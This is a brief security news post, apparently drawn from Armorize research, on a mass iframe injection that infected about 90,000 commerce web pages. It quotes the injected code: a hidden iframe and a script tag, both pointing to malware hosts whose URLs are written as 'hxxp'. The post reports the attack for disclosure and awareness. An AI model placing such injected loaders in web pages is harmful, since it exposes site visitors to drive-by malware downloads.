90000 Web Pages Infected by Mass IFrame Injection

Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered the Massive Iframe attack on commerce websites. There is more than 90000 websites infected by this attack. All infected websites pointing to willysy.com.

Google indicates more than 90,000 infected pages (note it's pages not domains)


Massive Injection:
initially it was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:
<script src="hxxp://exero.eu/catalog/jquery.js">
</script>

As per armorize, the infected websites redirected to some other malware domain and downloads malwares to client system.

Screenshots of Infected Pages:




Video :


source:armorize
Category: / / /

Share this with Your friends: